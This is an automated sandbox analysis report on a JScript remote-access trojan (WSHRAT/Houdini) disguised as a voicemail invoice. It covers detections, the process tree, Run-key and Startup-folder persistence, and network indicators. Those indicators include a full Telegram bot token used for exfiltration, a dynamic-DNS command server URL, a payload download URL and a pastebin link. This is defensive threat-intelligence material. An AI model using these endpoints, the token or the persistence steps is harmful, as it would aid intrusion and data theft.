Edit tour

Windows Analysis Report
New Voicemail Invoice 64746w .js

Overview

General Information

Sample name:	New Voicemail Invoice 64746w .js
Analysis ID:	1445449
MD5:	9b74a685ed15a0ec174e423bc96219fe
SHA1:	cfdccb7ffcf08d8190993e085285df372c04aa56
SHA256:	0d1fe5df992467049c46c24da324e37a2322255ff16462338f61a6c0daebaaf6
Infos:

Detection

WSHRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

JScript performs obfuscated calls to suspicious functions

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Register Wscript In Run Key

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected WSHRAT

AI detected suspicious sample

Connects to a pastebin service (likely for C&C)

Creates autostart registry keys with suspicious names

Drops script or batch files to the startup folder

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

JavaScript source code contains functionality to generate code involving a shell, file or stream

Potential obfuscated javascript found

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sample has a suspicious name (potential lure to open the executable)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: WScript or CScript Dropper - File

Uses dynamic DNS services

Uses known network protocols on non-standard ports

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript called in batch mode (surpress errors)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Found WSH timer for Javascript or VBS script (likely evasive script)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6996 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 5660 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 1436 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\98575.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 4192 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\98575.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 5700 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Houdini, WSHRAT	Houdini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.	No Attribution	http://blog.morphisec.com/hworm-houdini-aka-njrat http://blogs.360.cn/post/analysis-of-apt-c-37.html https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
sslproxydump.pcap	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\98575[1].js	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
C:\Users\user\AppData\Local\Temp\98575.js	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.2938355431.00000193969C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000007.00000003.2180517172.0000027242C12000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000007.00000003.2255737493.0000027242A3F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000007.00000003.2256293540.0000027242C1E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000007.00000003.2180342190.0000027242A3E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000001.00000003.1797163332.00000193950DB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000001.00000002.2937053189.00000193950D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000001.00000002.2938800577.0000019396F69000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000007.00000003.2255570115.0000027242752000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000007.00000003.2251240073.0000027244ABA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000001.00000003.1797358254.00000193952B4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000001.00000002.2937216627.00000193952BE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000007.00000003.2255381138.0000027243CE8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000001.00000002.2936761014.0000019394DFC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
00000001.00000002.2937959613.0000019396384000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
Process Memory Space: wscript.exe PID: 5660	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
Click to see the 11 entries

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 104.21.25.148, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6996, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6996, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js" , ProcessId: 5660, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6996, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js" , ProcessId: 5660, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js", CommandLine|base64offset|contains: Vzf, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js", ProcessId: 6996, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper - File

Source: File created

Author: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 6996, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\98575[1].js

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.21.25.148, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6996, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js", CommandLine|base64offset|contains: Vzf, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js", ProcessId: 6996, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js

Persistence and Installation Behavior

Sigma detected: Register Wscript In Run Key

Source: Registry Key set

Author: Joe Security: Data: Details: wscript.exe //B "C:\Users\user\AppData\Local\Temp\98575.js", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 5660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98575

Snort Signatures

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 40.242.114.161

Timestamp:	05/22/24-02:47:18.274642
SID:	2017516
Source Port:	49745
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 40.242.114.161

Timestamp:	05/22/24-02:47:44.674706
SID:	2017516
Source Port:	49751
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 40.242.114.161

Timestamp:	05/22/24-02:46:51.806517
SID:	2017516
Source Port:	49744
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 40.242.114.161

Timestamp:	05/22/24-02:48:11.147838
SID:	2017516
Source Port:	49752
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://textjdbimanrminiall.pages.dev/98575.js

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: masterokrwh.duckdns.org	Virustotal: Detection: 18%			Perma Link
Source: http://masterokrwh.duckdns.org:8426/is-ready	Virustotal: Detection: 17%			Perma Link

Multi AV Scanner detection for submitted file

Source: New Voicemail Invoice 64746w .js

Virustotal: Detection: 12%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.1% probability

Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.44.176:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior

Software Vulnerabilities

JavaScript source code contains functionality to generate code involving a shell, file or stream

Source: New Voicemail Invoice 64746w .js	Argument value : ['"Adodb.Stream"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Argument value : ['"WScript.Shell"', '"Adodb.Stream"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Return value : ['"WScript.Shell"', '"Adodb.Stream"', '"savetofile"']	Go to definition

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49744 -> 40.242.114.161:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49745 -> 40.242.114.161:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49751 -> 40.242.114.161:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49752 -> 40.242.114.161:8426

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 104.20.3.235 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 149.154.167.220 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 208.95.112.1 80	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 104.21.25.148 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 104.20.4.235 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 40.242.114.161 8426	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 172.66.44.176 443	Jump to behavior

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

Source: New Voicemail Invoice 64746w .js	Return value : ['"send"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Return value : ['"send"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Argument value : ['"Content-Type","application/json"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Return value : ['"send"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Argument value : ['"POST","https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage",fals']	Go to definition
Source: New Voicemail Invoice 64746w .js	Return value : ['"send"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Argument value : ['"Microsoft.XMLHTTP"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Argument value : ['"https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage"', '"https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg","/sendMessage"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Argument value : ['"https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage"', '"https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg","/sendMessage"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Argument value : ['"msxml2.xmlhttp"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Return value : ['"send"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Argument value : ['"User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom', '"send"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Return value : ['"/sendMessa"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Argument value : ['"msxml2.xmlhttp"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Return value : ['"/sendMessa"']	Go to definition
Source: New Voicemail Invoice 64746w .js	Return value : ['"User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom', '"send"', '"User-Agent"']	Go to definition

Uses dynamic DNS services

Source: unknown

DNS query: name: masterokrwh.duckdns.org

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 8426

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.4:49744 -> 40.242.114.161:8426

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: json.geoiplookup.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 104Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /98575.js HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: textjdbimanrminiall.pages.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: json.geoiplookup.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 104Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: json.geoiplookup.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 104Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Accept: /user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: json.geoiplookup.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /98575.js HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: textjdbimanrminiall.pages.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: json.geoiplookup.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: json.geoiplookup.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Accept: /user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com

Source: global traffic	DNS traffic detected: DNS query: json.geoiplookup.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: textjdbimanrminiall.pages.dev
Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: masterokrwh.duckdns.org

Source: unknown

HTTP traffic detected: POST /bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 104Host: api.telegram.org

Source: wscript.exe, 00000001.00000002.2938355431.00000193969C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2937551105.0000019395838000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: wscript.exe, 00000001.00000002.2938355431.00000193969C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/%
Source: wscript.exe, 00000001.00000002.2937551105.0000019395838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2936588497.0000019393205000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready
Source: wscript.exe, 00000001.00000003.1871507167.0000019396A09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2937551105.0000019395838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1870328410.0000019396FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2937551105.0000019395825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com/raw/NsQ5qTHr
